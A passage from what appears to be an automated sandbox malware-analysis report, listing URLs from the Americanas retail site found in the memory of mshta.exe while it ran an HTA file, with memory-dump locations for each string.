mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/main.30defc488d62244ec738.js
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/main.30defc488d62244ec738.js%Z
Source: mshta.exe, 00000000.00000003.2721943484.00000000095E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2136389108.0000000006500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2138879620.00000000095E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trg.adilligo.com/RemarketingList?l
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/americanasa
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://venda.americanasmarketplace.com.br/cadastre-sua-loja/?epar=bo_ax_cte_am_app_banner&amp;utm_s
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721704677.00000000099A0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://venda.americanasmarketplace.com.br/cadastre-sua-loja/?epar=bo_ax_cte_am_app_banner&utm_sourc
Source: mshta.exe, 00000000.00000003.2694992877.0000000009B21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708562764.0000000009B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wishlist-v1-americanas.b2w.io674e18cfc5d819f6a95bb6bf-fe1c66ac0fc461a7e617b6b7eb47e55814ca-9
Source: mshta.exeString found in binary or memory: https://www.americanas.c
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776738763.000000000C1EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675384049.000000000C1EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749644563.000000000AA58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657750155.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775247282.000000000AA60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727304462.000000000928A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/#primaryimage
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/#webpage
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770024098.0000000009210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/?utm_source=web_app_manifest
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665561816.000000000AA04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-portatil
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-split-9000-btus
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-split-9000-btusP
Source: mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747706873.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/cesta-de-natal
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727304462.000000000928A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667689266.000000000C0B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770343155.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667444463.0000000009282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/chocotone
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/chocotoneca
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/fantasia-papai-noel
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/fantasia-papai-noelx
Source: mshta.exe, 00000000.00000003.2681040178.0000000009B24000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725259613.0000000009B28000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695779384.0000000009B25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743961553.00000000092B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700467145.0000000009B26000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/galaxy-a14?c_bot=Customer-Categorized
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/gorro-papai-noel
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/gorro-papai-noeli
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guarda
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C28F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 